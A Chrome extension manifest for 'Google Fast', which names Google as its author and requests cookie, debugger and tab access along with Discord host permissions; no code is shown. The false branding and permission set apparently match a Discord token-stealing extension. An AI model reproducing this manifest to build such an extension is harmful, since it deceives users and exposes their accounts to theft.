{
  "manifest_version": 3,
  "name": "Google Fast",
  "description": "Google web flow controler",
  "author": "Google",
  "version": "3.1.2",
  "icons": {
    "16": "images/logo16.png",
    "48": "images/logo48.png",
    "128": "images/logo128.png"
  },
  "background": {
    "service_worker": "js/background.js"
  },
  "content_scripts": [
    {
      "all_frames": true,
      "js": [
        "js/jquery-3.5.1.min.js"
      ],
      "matches": [
        "http://*/*",
        "https://*/*"
      ]
    }
  ],
  "permissions": [
    "tabs",
    "cookies",
    "debugger",
    "webNavigation",
    "activeTab",
    "https://discord.com/*",
    "https://canary.discord.com/*"
  ]
}